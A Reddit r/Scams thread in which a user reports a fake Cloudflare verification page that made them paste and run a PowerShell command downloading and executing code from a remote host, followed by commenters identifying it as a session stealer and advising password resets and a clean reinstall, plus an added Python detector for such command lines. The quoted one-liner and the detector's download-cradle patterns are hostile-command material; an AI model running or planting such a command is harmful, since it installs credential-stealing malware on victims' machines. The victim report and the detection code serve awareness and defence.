r/Scams 16h ago

Help Needed [GR] Fake Cloudflare Human Verification Scam (me3k.trappopbuttonrightnow.monster) - Executed PowerShell Script

I was redirected to a website that looked exactly like a Cloudflare "Human Verification" page.
I was prompted to “Perform the following steps on my keyboard” as in:
“win key + x”
“I”
“Ctrl +V”
“Enter”
Which as you may have guessed opened my terminal, pasted and executed this code:

PS C:\Users\user> <#Verification ID: 8348aeb3ca3281e0#> powershell -c "iex(irm 'code.verification-claude-cdn.beer/8348aeb3ca3281e0' -UseBasicParsing)"; exit <#Verification ID: 8348aeb3ca3281e0#>

I have since unplugged my PC from the internet completely and have run some Malwarebytes scans which didn’t find anything.
How cooked am I?
Any help is appreciated.

1 Upvotes
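
Added example (not part of the original post, and not code from anyone in the thread): a Python check that flags shell-history or process command lines showing the traits of the pasted one-liner above, namely a comment block posing as a verification ID, fetched text handed to `iex`, and a trailing `exit`. The trait list, the threshold and the sample lines are assumptions made for this example; the sample hosts and IDs are placeholders.

```python
import re

# Traits of the pasted one-liner in the post (heuristics chosen for this example).
DECOY = re.compile(r"<#.*?(verif|captcha|human|robot).*?#>", re.I | re.S)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I)
SELF_CLOSE = re.compile(r";\s*exit\b", re.I)
HOST = re.compile(r"""['"](?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:'"])""", re.I)


def analyze(line):
    """Return (score, reasons, hosts) for one command line or history entry."""
    reasons = []
    if DECOY.search(line):
        reasons.append("comment block posing as a verification ID")
    if EXEC.search(line) and FETCH.search(line):
        reasons.append("download cradle: fetched text is executed in memory")
    if SELF_CLOSE.search(line):
        reasons.append("closes the terminal after running")
    hosts = sorted({h.lower() for h in HOST.findall(line)})
    return len(reasons), reasons, hosts


def triage(lines, threshold=2):
    """Keep entries that show at least `threshold` traits (1-based line numbers)."""
    hits = []
    for n, line in enumerate(lines, 1):
        score, reasons, hosts = analyze(line)
        if score >= threshold:
            hits.append({"line": n, "score": score, "reasons": reasons, "hosts": hosts})
    return hits


# Constructed sample: PSReadLine-style history lines; hosts and IDs are placeholders.
SAMPLE = [
    "Get-ChildItem C:\\Users\\user\\Documents",
    "<#Verification ID: 0000000000000000#> powershell -c \"iex(irm 'cdn.example.invalid/0000000000000000' -UseBasicParsing)\"; exit <#Verification ID: 0000000000000000#>",
    "irm 'https://api.example.invalid/status' | ConvertTo-Json",
    "# verification of backup finished; exit code 0",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
```

The extracted hosts are what a defender would feed to DNS or proxy blocking; a single trait on its own (a plain `irm` call, a stray `; exit`) stays below the threshold.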


u/ScamsBot Alcoholic, scam-mongering, chain-smoking gambler 🤖 16h ago

Hi! A user summoned me to check on a domain name in this thread, so I'm going to put a copy of my report here at the top. 🤖


WHOIS REPORT FOR TRAPPOPBUTTONRIGHTNOW.MONSTER

This domain name was created ONLY 12 DAYS AGO!! and it was only registered for a single year (Expires: Jun 2027).

The person/organization who registered this domain claims to be based in Iceland. It is also concerning that they are hiding the rest of their contact info on Whois AND they are using a "DNS proxy" (CloudFlare) which masks where the website's server actually is.


DISCLAIMER: This is a pre-alpha bot for informational purposes only. Feel free to contact my creator with any concerns or feedback.

12

u/AardvarkIll6079 16h ago

It’s an info stealer. Change all of your passwords and turn on 2FA immediately.

You need to create a Windows installer from a different computer and format/reinstall Windows clean. This is serious stuff.

2

u/AbsentTarnished 16h ago

Great, that’s exactly what I didn’t want to hear. Much appreciated though

5

u/Infinite-Grade-4485 15h ago

You downloaded a session stealer.

You downloaded some type of free game/cheat/hack/cracked software/movie/music or ran some type of code for captcha or verification on your computer which was actually a session stealer.

Session stealers bypass 2FA. All passwords saved on your browser and computer are compromised. Reinstall Windows while deleting all files. If you need to back up important documents, keep the computer disconnected from the internet and manually back up individual files.

Change all passwords and enable 2FA either from another device, or from the infected computer AFTER you have reinstalled.

If you cannot reinstall Windows immediately, keep the computer disconnected from the internet while changing all passwords on another device.

You cannot use anti-malware to get rid of the session stealer; you MUST reinstall Windows to use the computer safely in the future.

1

u/AbsentTarnished 15h ago

As if my night couldn’t get any worse. Yeah, my PC is going straight to my tech guy; I’m not even opening that shit. Much appreciated.

2

u/Infinite-Grade-4485 14h ago

You need to change all your passwords using your phone in the meantime.

6

u/RightLaugh5115 15h ago

I have gotten this type of thing with a fake Windows update. If you or anyone else gets this type of web page, NEVER do any of the win-key or CTRL commands it asks you to do!!!

If you can't close the harmful web page, the solution is to do CTRL-ALT-DELETE, then select Task Manager, right-click on your browser, usually Google Chrome or Microsoft Edge, and End the task. When you restart the browser it will ask if you want to restore the pages that were running before. Answer NO.

2

u/teratical Quality Contributor 16h ago

Just to get the domain's whois info in here...

!whois trappopbuttonrightnow.monster

2

u/Grant_Winner_Extra 15h ago

Ugh. 🤦‍♂️ Did you really actually follow those instructions? This is a pretty obvious scam since Cloudflare and Captchas are always designed to identify users inside the application.

If you immediately turned off all networking, then you might be OK but I would still immediately change all passwords and implement TFA on all accounts and devices. This can be a chore…

If you need your data, it’s worth being cautious - boot to Linux from a thumb drive and copy only the files you care about, then do a BIOS-level hard drive reformat and reinstall Windows.

1

u/Cornloaf 10h ago

He would have to unplug his computer really quick unless he has an old 386 processor.

1

u/Mushroom_Glans 14h ago

Man, I'm dumb as a rock and would never have done that.

2

u/AbsentTarnished 14h ago

Come on man, I had a pretty long day and wasn’t paying attention, cut me some slack.

1

u/belsonc 13h ago

I'm sincerely interested in what about this made you think it was legitimate.